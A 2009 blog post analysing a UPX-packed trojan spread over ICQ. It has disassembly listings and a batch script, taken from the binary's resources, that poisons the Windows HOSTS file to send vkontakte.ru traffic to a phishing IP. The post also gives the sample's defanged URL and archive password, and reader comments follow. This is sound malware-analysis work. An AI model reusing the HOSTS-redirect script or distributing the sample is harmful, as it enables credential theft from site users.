Phishing on Saturday …

It’s quite often to happen with average user on the Internet – to recieve spam. Sometimes it advertises some junk, but sometimes it asks user to run some executable which does some magic, for example, it allows to send sms to any mobile operator for free :). As every human being is a little bit naive, this works : people do run executables coming from Internet and thus get infected. Sometimes even antivirus software is silent, this makes user to feel safe and run something…

Once upon a time (more precise : 20 of June 2009) I recieved a link by ICQ from unknown user. Well, sometimes this happens, I wanted to ingnore it, but a pure curiosity forced me to check the link and the file with my antivirus. The link is http://noko1.free.of.pl/imert.[REMOVE_THIS]exe and my antivirus found nothing. It made me even more interested in binary. I checked the file using PE ID utility and it seems like the executable is packed using UPX packer, as it contains UPX1 section.

It’s quite simple to unpack the binary using upx unpacker :

upx

Now the file can be openeded in Ida and analyzed in more details. It’s entry point is a little bit special, as it does not contain standart CRT prologue. Instead, it does some magic heaps allocations and makes operations with strings:

.code:00401000                 public start
.code:00401000 start           proc near
.code:00401000
.code:00401000 var_10          = dword ptr -10h
.code:00401000 var_C           = dword ptr -0Ch
.code:00401000 var_8           = dword ptr -8
.code:00401000 var_4           = dword ptr -4
.code:00401000
.code:00401000                 push    0C4h            ; size_t
.code:00401005                 push    0               ; int
.code:0040100A                 push    offset hHeap    ; void *
.code:0040100F                 call    memset
.code:00401014                 add     esp, 0Ch
.code:00401017                 push    0               ; lpModuleName
.code:0040101C                 call    GetModuleHandleA
.code:00401021                 mov     hModule, eax
.code:00401026                 push    0               ; dwMaximumSize
.code:0040102B                 push    1000h           ; dwInitialSize
.code:00401030                 push    0               ; flOptions
.code:00401035                 call    HeapCreate
.code:0040103A                 mov     hHeap, eax
.code:0040103F                 call    sub_403000
.code:00401044                 call    sub_407470
.code:00401049                 call    sub_406807
.code:0040104E                 call    sub_406040
.code:00401053                 call    sub_404AB3
.code:00401058                 call    sub_4040E0
.code:0040105D                 call    sub_403D90
.code:00401062                 call    sub_40393B
.code:00401067                 call    sub_403694
.code:0040106C                 push    7
.code:00401071                 push    offset unk_40A388
.code:00401076                 lea     eax, dword_40B1B8
.code:0040107C                 push    eax
.code:0040107D                 push    8
.code:00401082                 call    sub_403EF0
.code:00401087                 mov     dword_40B1B4, eax
.code:0040108C                 push    7
.code:00401091                 push    offset dword_40B1AC
.code:00401096                 push    offset unk_40A380
.code:0040109B                 mov     edx, dword_40B1AC
.code:004010A1                 call    sub_403060
.code:004010A6                 mov     eax, 401h
.code:004010AB                 push    8
.code:004010B0                 call    sub_4030A0
.code:004010B5                 push    400h            ; dwBytes
.code:004010BA                 call    sub_403DC0
.code:004010BF                 mov     szLang, eax
.code:004010C4                 push    8               ; nSize
.code:004010C9                 push    szLang          ; szLang
.code:004010CF                 call    GetUserDefaultLangID
.code:004010D4                 push    eax             ; wLang
.code:004010D5                 call    VerLanguageNameA
.code:004010DA                 push    szLang          ; lpsz
.code:004010E0                 call    CharLowerA
.code:004010E5                 mov     eax, dword_40B3B0
.code:004010EA                 push    eax
.code:004010EB                 push    eax
.code:004010EC                 push    8
.code:004010F1                 push    szLang
.code:004010F7                 call    sub_403DE0
.code:004010FC                 lea     ecx, dword_40B134
.code:00401102                 pop     edx
.code:00401103                 call    sub_4030F0
.code:00401108                 push    szLang          ; lpMem
.code:0040110E                 call    sub_403E30
.code:00401113                 push    dword_40B134
.code:00401119                 mov     edx, offset aDeutsch ; "deutsch"
.code:0040111E                 pop     ecx
.code:0040111F                 call    sub_4074C0
.code:00401124                 jz      loc_4011FF
.code:0040112A                 mov     edx, offset aFortfahren? ; "Fortfahren?"
.code:0040112F                 lea     ecx, dword_40B138 ; int
.code:00401135                 call    sub_403108
.code:0040113A                 mov     edx, offset aFehler ; "Fehler!"
.code:0040113F                 lea     ecx, lpCaption  ; int
.code:00401145                 call    sub_403108
.code:0040114A                 mov     edx, offset aEinigeIncludeD ; "Einige Include Dateien konnten nicht er"...
.code:0040114F                 lea     ecx, dword_40B140 ; int
.code:00401155                 call    sub_403108
.code:0040115A                 mov     edx, offset aNichtGen ; "Nicht gen"
.code:0040115F                 lea     ecx, dword_40B144 ; int
.code:00401165                 call    sub_403108
.code:0040116A                 mov     edx, offset aFalschesPasswo ; "Falsches Passwort."
.code:0040116F                 lea     ecx, dword_40B148 ; int
.code:00401175                 call    sub_403108
.code:0040117A                 mov     edx, offset aBerschreiben? ; "-berschreiben?"
.code:0040117F                 lea     ecx, dword_40B14C ; int
.code:00401185                 call    sub_403108
.code:0040118A                 mov     edx, offset aDieDatei ; "Die Datei "
.code:0040118F                 lea     ecx, dword_40B150 ; int
.code:00401195                 call    sub_403108
.code:0040119A                 mov     edx, offset aExistiertBerei ; " existiert bereits im aktuellen Arbeits"...
.code:0040119F                 lea     ecx, dword_40B154 ; int
.code:004011A5                 call    sub_403108
.code:004011AA                 mov     edx, offset aEinUnbekannter ; "Ein unbekannter Fehler ist aufgetreten."...
.code:004011AF                 lea     ecx, dword_40B158 ; int
.code:004011B5                 call    sub_403108
.code:004011BA                 mov     edx, offset aDasProgrammWir ; "Das Programm wird von diesem Betriebssy"...
.code:004011BF                 lea     ecx, lpText     ; int
.code:004011C5                 call    sub_403108
.code:004011CA                 mov     edx, offset aBitteWfhlenSie ; "Bitte w?hlen Sie einen Ordner zum Speic"...
.code:004011CF                 lea     ecx, dword_40B160 ; int
.code:004011D5                 call    sub_403108
.code:004011DA                 mov     edx, offset aPasswort ; "Passwort"
.code:004011DF                 lea     ecx, dword_40B164 ; int
.code:004011E5                 call    sub_403108
.code:004011EA                 mov     edx, offset aBitteGebenSieD ; "Bitte geben Sie das Passwort ein."
.code:004011EF                 lea     ecx, lpWindowName ; int
.code:004011F5                 call    sub_403108
.code:004011FA                 jmp     loc_4012CF
.code:004011FF ; ---------------------------------------------------------------------------
.code:004011FF
.code:004011FF loc_4011FF:                             ; CODE XREF: start+124j
.code:004011FF                 mov     edx, offset aContinue? ; "Continue?"
.code:00401204                 lea     ecx, dword_40B138 ; int
.code:0040120A                 call    sub_403108
.code:0040120F                 mov     edx, offset aError ; "Error!"
.code:00401214                 lea     ecx, lpCaption  ; int
.code:0040121A                 call    sub_403108
.code:0040121F                 mov     edx, offset aCanNotCreateSo ; "Can not create some of your include fil"...
.code:00401224                 lea     ecx, dword_40B140 ; int
.code:0040122A                 call    sub_403108
.code:0040122F                 mov     edx, offset aCanNotAllocate ; "Can not allocate the memory."
.code:00401234                 lea     ecx, dword_40B144 ; int
.code:0040123A                 call    sub_403108
.code:0040123F                 mov     edx, offset aWrongPassword_ ; "Wrong password."
.code:00401244                 lea     ecx, dword_40B148 ; int
.code:0040124A                 call    sub_403108
.code:0040124F                 mov     edx, offset aOverwrite? ; "Overwrite?"
.code:00401254                 lea     ecx, dword_40B14C ; int
.code:0040125A                 call    sub_403108
.code:0040125F                 mov     edx, offset aTheFile ; "The file "
.code:00401264                 lea     ecx, dword_40B150 ; int
.code:0040126A                 call    sub_403108
.code:0040126F                 mov     edx, offset aAlreadyExistsI ; " already exists in the current director"...
.code:00401274                 lea     ecx, dword_40B154 ; int
.code:0040127A                 call    sub_403108
.code:0040127F                 mov     edx, offset aAnUnknownError ; "An unknown error occured. The program w"...
.code:00401284                 lea     ecx, dword_40B158 ; int
.code:0040128A                 call    sub_403108
.code:0040128F                 mov     edx, offset aThisProgramIsN ; "This program is not supported on this o"...
.code:00401294                 lea     ecx, lpText     ; int
.code:0040129A                 call    sub_403108
.code:0040129F                 mov     edx, offset aChooseALocatio ; "Choose a location to save the files."
.code:004012A4                 lea     ecx, dword_40B160 ; int
.code:004012AA                 call    sub_403108
.code:004012AF                 mov     edx, offset aPassword ; "Password"
.code:004012B4                 lea     ecx, dword_40B164 ; int
.code:004012BA                 call    sub_403108
.code:004012BF                 mov     edx, offset aPleaseEnterThe ; "Please enter the password."
.code:004012C4                 lea     ecx, lpWindowName ; int
.code:004012CA                 call    sub_403108
.code:004012CF
.code:004012CF loc_4012CF:                             ; CODE XREF: start+1FAj
.code:004012CF                 call    sub_403CD7
.code:004012D4                 mov     ebx, eax
.code:004012D6                 cmp     ebx, 32h
.code:004012D9                 jge     short loc_4012F6
.code:004012DB                 push    10h             ; uType
.code:004012E0                 push    lpText          ; lpText
.code:004012E6                 push    lpCaption       ; lpCaption
.code:004012EC                 call    sub_4036A2
.code:004012F1                 jmp     loc_401B9F
.code:004012F6 ; ---------------------------------------------------------------------------
.code:004012F6
.code:004012F6 loc_4012F6:                             ; CODE XREF: start+2D9j
.code:004012F6                 lea     eax, TopLevelExceptionFilter
.code:004012FC                 push    eax             ; lpTopLevelExceptionFilter
.code:004012FD                 call    sub_403B70
.code:00401302                 call    sub_403A66
.code:00401307                 mov     dword_40B170, eax

It is not clear the purpose of this, I suppose the main idea is to mix code and fool the heuristics and signature checks of antiviruses. Further start interesting thigs. The code starts to touch own resources:

.code:004020B1                 xor     eax, eax
.code:004020B3                 push    eax
.code:004020B4                 push    eax
.code:004020B5                 mov     edx, [esp+8+arg_4] ; char *
.code:004020B9                 lea     ecx, [esp+8+lpName] ; int
.code:004020BC                 call    sub_403100
.code:004020C1                 push    0Ah             ; lpType
.code:004020C6                 push    [esp+0Ch+lpName] ; lpName
.code:004020CA                 push    [esp+10h+hModule] ; hModule
.code:004020CE                 call    FindResourceA
.code:004020D3                 mov     [esp+8+hResInfo], eax
.code:004020D7                 cmp     [esp+8+hResInfo], 0
.code:004020DC                 jz      short loc_402102
.code:004020DE                 push    [esp+8+hResInfo] ; hResInfo
.code:004020E2                 push    [esp+0Ch+hModule] ; hModule
.code:004020E6                 call    LoadResource
.code:004020EB                 mov     szLang, eax
.code:004020F0                 push    [esp+8+hResInfo] ; hResInfo
.code:004020F4                 push    [esp+0Ch+hModule] ; hModule
.code:004020F8                 call    SizeofResource
.code:004020FD                 mov     dword_40B16C, eax

It’s easy to see resources of application using ResHacker tool. Just open the file, and selectivly check all data untill you find something interesting. In my case, the following data is found:

echo
echo loliki
echo 220.225.200.15 net.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 220.225.200.15 farmer.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 220.225.200.15 net.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 220.225.200.15 vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 220.225.200.15 forex.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 220.225.200.15 www.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 220.225.200.15 durov.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo hgfghfghgf
echo l64
end

Does it remind you something? Correct, this seems to be a content of a bat file which changes the records of HOSTS file thus causing the traffic going to http://vkontakte.ru web site to be redirected to IP 220.225.200.15. To prove this, I need to find the place in binary where the bat file actually is executed. The best way to accomplish this is to run the file under debugger and trace it untill the ShellExecute function is called (why ShellExecute? because there is no CreateProcess in import table :) ):

00402761     $ 55                    PUSH EBP
00402762     . 53                    PUSH EBX
00402763     . BA 14000000           MOV EDX,14
00402768     > 83EC 04               SUB ESP,4
0040276B     . C70424 00000000       MOV DWORD PTR SS:[ESP],0
00402772     . 4A                    DEC EDX
00402773     .^75 F3                 JNZ SHORT imert.00402768
00402775     . 8B5424 5C             MOV EDX,DWORD PTR SS:[ESP+5C]
00402779     . 8D0C24                LEA ECX,DWORD PTR SS:[ESP]
0040277C     . E8 7F090000           CALL imert.00403100
00402781     . 8B5424 60             MOV EDX,DWORD PTR SS:[ESP+60]
00402785     . 8D4C24 04             LEA ECX,DWORD PTR SS:[ESP+4]
00402789     . E8 72090000           CALL imert.00403100
0040278E     . 8B5424 64             MOV EDX,DWORD PTR SS:[ESP+64]
00402792     . 8D4C24 08             LEA ECX,DWORD PTR SS:[ESP+8]
00402796     . E8 65090000           CALL imert.00403100
0040279B     . 8D4424 0C             LEA EAX,DWORD PTR SS:[ESP+C]
0040279F     . 8D6C24 0C             LEA EBP,DWORD PTR SS:[ESP+C]
004027A3     . C745 00 3C000000      MOV DWORD PTR SS:[EBP],3C
004027AA     . C745 04 40010000      MOV DWORD PTR SS:[EBP+4],140
004027B1     . C745 1C 00000000      MOV DWORD PTR SS:[EBP+1C],0
004027B8     . B8 0EA14000           MOV EAX,imert.0040A10E                       ;  ASCII "open"
004027BD     . 8945 0C               MOV DWORD PTR SS:[EBP+C],EAX
004027C0     . 8B0424                MOV EAX,DWORD PTR SS:[ESP]
004027C3     . 8945 10               MOV DWORD PTR SS:[EBP+10],EAX
004027C6     . 8B4424 08             MOV EAX,DWORD PTR SS:[ESP+8]
004027CA     . 8945 14               MOV DWORD PTR SS:[EBP+14],EAX
004027CD     . 8B4424 04             MOV EAX,DWORD PTR SS:[ESP+4]
004027D1     . 8945 18               MOV DWORD PTR SS:[EBP+18],EAX
004027D4     . 8D4424 0C             LEA EAX,DWORD PTR SS:[ESP+C]
004027D8     . 50                    PUSH EAX
004027D9     . E8 2D580000           CALL 

Probably the function snipped from Ida will be more interesting, as it is more user friendly:

.code:00402761 sub_402761      proc near               ; CODE XREF: start+B1Dp
.code:00402761
.code:00402761 var_C           = dword ptr -0Ch
.code:00402761 lpMem           = dword ptr -8
.code:00402761 var_4           = dword ptr -4
.code:00402761 arg_38          = dword ptr  3Ch
.code:00402761 ExitCode        = dword ptr  40h
.code:00402761 arg_4C          = dword ptr  50h
.code:00402761 arg_50          = dword ptr  54h
.code:00402761 arg_54          = dword ptr  58h
.code:00402761
.code:00402761                 push    ebp
.code:00402762                 push    ebx
.code:00402763                 mov     edx, 14h
.code:00402768
.code:00402768 loc_402768:                             ; CODE XREF: sub_402761+12j
.code:00402768                 sub     esp, 4
.code:0040276B                 mov     [esp+0Ch+var_C], 0
.code:00402772                 dec     edx
.code:00402773                 jnz     short loc_402768
.code:00402775                 mov     edx, [esp+0Ch+arg_4C] ; char *
.code:00402779                 lea     ecx, [esp+0Ch+var_C] ; int
.code:0040277C                 call    sub_403100
.code:00402781                 mov     edx, [esp+0Ch+arg_50] ; char *
.code:00402785                 lea     ecx, [esp+0Ch+lpMem] ; int
.code:00402789                 call    sub_403100
.code:0040278E                 mov     edx, [esp+0Ch+arg_54] ; char *
.code:00402792                 lea     ecx, [esp+0Ch+var_4] ; int
.code:00402796                 call    sub_403100
.code:0040279B                 lea     eax, [esp+0Ch]
.code:0040279F                 lea     ebp, [esp+0Ch]
.code:004027A3                 mov     dword ptr [ebp+0], 3Ch
.code:004027AA                 mov     dword ptr [ebp+4], 140h
.code:004027B1                 mov     dword ptr [ebp+1Ch], 0
.code:004027B8                 mov     eax, offset aOpen ; "open"
.code:004027BD                 mov     [ebp+0Ch], eax
.code:004027C0                 mov     eax, [esp+0Ch+var_C]
.code:004027C3                 mov     [ebp+10h], eax
.code:004027C6                 mov     eax, [esp+0Ch+var_4]
.code:004027CA                 mov     [ebp+14h], eax
.code:004027CD                 mov     eax, [esp+0Ch+lpMem]
.code:004027D1                 mov     [ebp+18h], eax
.code:004027D4                 lea     eax, [esp+0Ch]
.code:004027D8                 push    eax             ; lpExecInfo
.code:004027D9                 call    ShellExecuteExA
.code:004027DE                 mov     [esp+0Ch+arg_38], eax
.code:004027E2
.code:004027E2 loc_4027E2:                             ; CODE XREF: sub_402761:loc_40280Fj
.code:004027E2                 push    19h             ; dwMilliseconds
.code:004027E7                 call    Sleep
.code:004027EC                 lea     eax, [esp+0Ch+ExitCode]
.code:004027F0                 push    eax             ; lpExitCode
.code:004027F1                 lea     ebp, [esp+10h]
.code:004027F5                 push    dword ptr [ebp+38h] ; hProcess
.code:004027F8                 call    GetExitCodeProcess

Strange, yes? Why would someone would like to redirect traffic into another web site? Let us check weblink http://220.225.200.15 and http://vkontakte.ru … They seems to be almost identical, yes? The differences are barely seen. Which means user wishes to enter web site http://vkontakte.ru but actually is redirected into http://220.225.200.15 and enters his login, password into unknown web site. Let us check the official IPs of web site http://vkontakte.ru :

C:\Program Files\Far> nslookup vkontakte.ru
Reponse ne faisant pas autorite :
Nom :    vkontakte.ru
Addresses:  93.186.224.238
                 93.186.224.239
                 93.186.225.6
                 93.186.225.211
                 93.186.225.212
                 93.186.226.4
                 93.186.226.5
                 93.186.226.129
                 93.186.226.130
                 93.186.227.123
                 93.186.227.124
                 93.186.227.125
                 93.186.227.126
                 93.186.227.129
                 93.186.227.130
                 93.186.224.233
                 93.186.224.234
                 93.186.224.235
                 93.186.224.236
                 93.186.224.237

None of them seems to be equal to 220.225.200.15. Now, let’s check the official http://vkontakte.ru IPs location at http://ip2location.com web site. Notice that they all are situated in Russian Federation. Now check 220.225.200.15 and notice that it is India …

A little background. The website http://vkontakte.ru is one of the biggest social network in CIS (Commonwealth of Independent States) counting more than 30 millions of users. So, this is a very good source for malware writers to steal passwords and other private information. It is pity that mine antivirus which is Eset Smart Security 4.0 could not detect this kind of threat. I also tried to check the file using trial version of Norton antivirus, and it also did not warned me. Don’t trust your antivirus even if it is one of the best ;)

If you would like to get an access to this executable file, use it at your own risk. File can be found at this link in rar arhive protected with password: iunderstandtherisks

UPDATE: I’ve sent this link to Eset Nod32 support, and they updated own database. Starting from 24 of June 2009 the file is detected as Win32/Qhost.NLB trojan.

7 Comments

  1. Спасибо Владимир за увлекательную статью (детектив прям :)

    кстати, а вот вроде unpacked версию NOD32 всё равно не детектит? :)

    Файл imert_unpacked.exe0
    http://www.virustotal.com/ru/analisis/4e63bbd6c0f58692ea0673f3397c864508c30cda0b167d8192aae514719914ca-1246131904

    Файл imert_original.exe0
    http://www.virustotal.com/ru/analisis/83396f4be9da3b831830ab8f1d53ad59279374f4dccf9e6a178a9d64d77c8f7b-1246131942

  2. Странные они, неужели трудно проверить. паковщик то самый распространенный на данный момент imho. У меня недавно таже самая ситуация с trend micro была с другим вирусом. Послал. добавили. пишу распакованная версия не детектится – пишу как распоковать. они – всё хорошо всё детектится. распоковал сам и послал заново. теперь добавили.

    причём имена получились совсем не похожи.
    WORM_AUTORUN.FIG – это запакованная так детектится запакованная.

    TROJ_EMBEDDED.CN – а так распакованная
    :)

  3. Предполгаю что они не заморачиваются, и просто делают сигнатуры по файлу. Другой файл, другие сигнатуры, хотя я надеялся что это будет детектить эвристика. Т.к. подход по сигнатурам – это очень просто и не всегда надежно, т.к. меняется упаковщик и проблема снова возникает.

Leave a Reply

Your email address will not be published. Required fields are marked *


five + 2 =

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>